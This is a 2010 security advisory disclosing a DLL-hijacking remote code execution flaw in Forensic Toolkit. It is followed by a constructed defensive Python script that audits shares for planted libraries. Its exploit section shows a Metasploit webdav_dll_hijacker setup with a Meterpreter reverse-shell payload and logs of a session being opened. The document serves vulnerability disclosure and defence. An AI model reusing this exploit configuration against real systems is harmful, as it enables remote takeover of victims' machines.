Advisory: Forensic Toolkit - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 02.09.2010]
- in a nutshell:
---------------------------------------------
Forensic Toolkit - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- Forensic Toolkit Description
Forensic Toolkit (FTK) is recognized around the world as the standard in computer forensics software. This court-validated digital investigations platform delivers cutting-edge computer forensic analysis, decryption and password cracking all within an intuitive and customizable interface.
- Insecure Library Loading Allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework's webdav_dll_hijacker module with the following option: "set EXTENSIONS ftk"
For further vulnerability details please check the links in the reference section.
- Affected Versions
1.81.5/1.81.6 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
http://www.accessdata.com/forensictoolkit.html
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS ftk
EXTENSIONS => ftk
msf exploit(webdav_dll_hijacker) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASENAME policy yes The base name for the listed files.
EXTENSIONS ftk yes The list of extensions to generate
SHARENAME documents yes The name of the top-level share.
SRVHOST 10.8.28.9 yes The local host to listen on.
SRVPORT 80 yes The daemon port to listen on (do not change)
URIPATH / yes The URI to use (do not change).
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST 10.8.28.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
<snip>
[*] 10.8.28.55:49275 PROPFIND /documents
[*] 10.8.28.55:49275 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49275 PROPFIND /documents/
[*] 10.8.28.55:49275 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49275 PROPFIND /documents/MFC90DEU.DLL
[*] 10.8.28.55:49275 PROPFIND => 207 File (/documents/MFC90DEU.DLL)
[*] 10.8.28.55:49275 GET => DLL Payload
[*] 10.8.28.55:49275 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49275 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 9 opened (10.8.28.9:4444 -> 10.8.28.55:49276) at Sun Aug 29 23:09:54 +0200 2010
[*] 10.8.28.55:49275 PROPFIND /documents/CodeMeter.exe
[*] 10.8.28.55:49275 PROPFIND => 404 (/documents/CodeMeter.exe)
msf exploit(webdav_dll_hijacker) > sessions -i 9
[*] Starting interaction with 9...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
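As an added, defender-side example that is not part of this advisory: the session above shows FTK probing the document share for MFC90DEU.DLL (served), rundll32.exe and CodeMeter.exe (not found) when a .ftk file is opened from it. The constructed Python audit below walks a share and flags library files stored beside documents of a watched extension; the share layout and the flagged names are assumptions built from that session, not a tool from the advisory's author.

```python
"""Audit a document share for DLL-planting candidates next to FTK case files.

Constructed example (not part of the advisory): it builds a throwaway
directory tree, then flags any .dll/.exe stored alongside files whose
extension the vulnerable application opens (here 'ftk').
"""
import os
import tempfile
from pathlib import Path

# Names the advisory's session shows FTK probing in the document directory.
KNOWN_PROBED = {"mfc90deu.dll", "rundll32.exe", "codemeter.exe"}
LIBRARY_SUFFIXES = {".dll", ".exe"}


def find_planted_libraries(root, doc_extensions=("ftk",)):
    """Return [(directory, library_name, known_probe)] for every library
    file that shares a directory with a document of a watched extension."""
    wanted = {"." + e.lower().lstrip(".") for e in doc_extensions}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        names = {f.lower() for f in files}
        if not any(Path(n).suffix in wanted for n in names):
            continue  # no document here that would trigger the DLL search
        for f in sorted(files):
            if Path(f).suffix.lower() in LIBRARY_SUFFIXES:
                findings.append((dirpath, f, f.lower() in KNOWN_PROBED))
    return findings


def build_sample_share():
    """Constructed share layout mirroring the advisory's /documents share."""
    root = tempfile.mkdtemp(prefix="share_")
    docs = Path(root, "documents")
    docs.mkdir()
    (docs / "policy.ftk").write_bytes(b"")       # the lure document
    (docs / "MFC90DEU.DLL").write_bytes(b"MZ")   # planted library
    clean = Path(root, "clean")
    clean.mkdir()
    (clean / "notes.txt").write_bytes(b"")
    (clean / "helper.dll").write_bytes(b"MZ")    # no watched document here
    return root


if __name__ == "__main__":
    for d, name, known in find_planted_libraries(build_sample_share()):
        tag = " (name FTK is known to probe)" if known else ""
        print(f"{d}: {name}{tag}")
```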